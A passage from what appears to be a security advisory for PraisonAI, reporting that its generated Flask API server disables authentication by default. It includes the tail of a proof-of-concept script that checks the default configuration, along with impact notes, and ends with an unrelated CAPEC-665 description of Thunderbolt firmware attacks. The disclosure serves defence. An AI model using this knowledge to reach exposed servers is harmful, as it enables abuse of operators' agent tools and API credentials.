praisonai.deploy.api import generate_api_server_code\n    cfg = APIConfig(auth_enabled=True, auth_token=\"s3cret-bearer-value\")\n    src = generate_api_server_code(\"agents.yaml\", config=cfg)\n    assert \"AUTH_ENABLED = True\" in src\n    assert \"AUTH_ENABLED = False\" not in src\n    print(\"  \u003e\u003e Fix shape works when toggled. Class H confirmed: default is insecure.\")\n\ndef main():\n    print(\"=\" * 64)\n    print(\"legend-c420 PoC - PraisonAI default-config AUTH_ENABLED=False\")\n    print(\"=\" * 64)\n    try:\n        phase1_dataclass_defaults()\n        phase2_default_generator_emits_unauth()\n        phase3_fix_shape_available()\n    except Exception:\n        traceback.print_exc()\n        print(\"FAIL\"); sys.exit(2)\n    print(\"PASS 3/3 phases. EXIT 0.\")\n    sys.exit(0)\n\nif __name__ == \"__main__\":\n    main()\n```\n\n**PoC dependencies:** `praisonai==4.6.33` from PyPI. Tested on Python 3.11.\n\n**Run log verdict:** `PASS 3/3 phases. EXIT 0.` \u2014 vulnerable-default shape confirmed. `auth_enabled=False` by default, `check_auth()` short-circuits to `True`, fix toggle exists but is opt-in.\n\n### Impact\n\nAn operator who runs the vendor-documented quickstart (`pip install praisonai \u0026\u0026 praisonai deploy --type api`) gets a network-reachable Flask server that invokes `praisonai.run()` on attacker-supplied JSON with the user\u0027s LLM API keys in the process environment. The attacker reaches arbitrary LLM-orchestration (including any tool-use the agents define, which in PraisonAI commonly includes `python_repl`, `bash`, file I/O, and HTTP calls), with the host\u0027s API-key credit billed to the operator.\n\n- **Belief:** CVE-2026-44338 was filed and triaged.\n- **Reality:** `praisonai==4.6.33` is current `@latest` on PyPI (2026-05-16). The generator still defaults to `auth_enabled=False`.\n- **Gap:** The CVE acknowledges the fix shape exists. The fix is opt-in. The default-config consumer remains vulnerable.\n\n**Parent CVE:** CVE-2026-44338 / GHSA-6rmh-7xcm-cpxj",
  "id": "GHSA-8444-4fhq-fxpq",
  "modified": "2026-05-29T22:29:20Z",
  "published": "2026-05-29T22:29:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8444-4fhq-fxpq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-6rmh-7xcm-cpxj"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI `deploy --type api` emits a Flask server with authentication disabled by default"
}

No mitigation information available for this CWE.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.